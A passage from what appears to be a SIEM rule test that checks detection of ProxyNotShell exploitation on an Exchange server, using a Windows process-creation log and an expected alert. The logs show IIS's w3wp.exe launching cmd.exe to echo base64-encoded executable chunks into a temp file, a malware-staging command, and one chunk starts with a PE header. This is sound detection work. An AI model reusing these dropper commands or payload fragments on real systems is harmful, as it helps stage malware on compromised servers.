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>>%TEMP%\\\\RsJnf.b64\",\"Name\":\"CommandLine\"},{\"text\":\"S-1-0-0\",\"Name\":\"TargetUserSid\"},{\"text\":\"-\",\"Name\":\"TargetUserName\"},{\"text\":\"-\",\"Name\":\"TargetDomainName\"},{\"text\":\"0x0\",\"Name\":\"TargetLogonId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\"Name\":\"ParentProcessName\"},{\"text\":\"S-1-16-16384\",\"Name\":\"MandatoryLabel\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Operating system", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "example", "object.account.id": "S-1-5-18", "object.account.name": "exchange$", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\System32\\cmd.exe\" /c echo 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>>%TEMP%\\RsJnf.b64", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.id": "7524", "object.process.name": "cmd.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "object.process.parent.id": "10384", "object.process.parent.name": "w3wp.exe", "object.process.parent.path": "c:\\windows\\system32\\inetsrv\\", "object.process.path": "c:\\windows\\system32\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-04-03T10:05:03.447Z", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-18", "subject.account.name": "exchange$", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "999", "subject.state": "on behalf of oneself", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-03-29T12:26:10.050Z", "type": "raw", "uuid": "d705d7f5-fd68-4466-817c-9b49846fc7a5"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "alert.regex_match": "/c echo ...>>%temp%\\rsjnf.b64", "category.generic": "Attack", "category.high": "Initial Access", "category.low": "Exploit Public-Facing Application", "correlation_name": "ProxyNotShell", "correlation_type": "incident", "detect": "CVE-2022-41040|CVE-2022-41082", "dst.fqdn": "exchange.example.com", "dst.host": "exchange.example.com", "dst.hostname": "exchange", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "ProxyNotShell|exchange.example.com|k_ivanov", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "example", "object.account.id": "S-1-5-18", "object.account.name": "exchange$", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\System32\\cmd.exe\" /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAeGg3SgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAABqtgAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA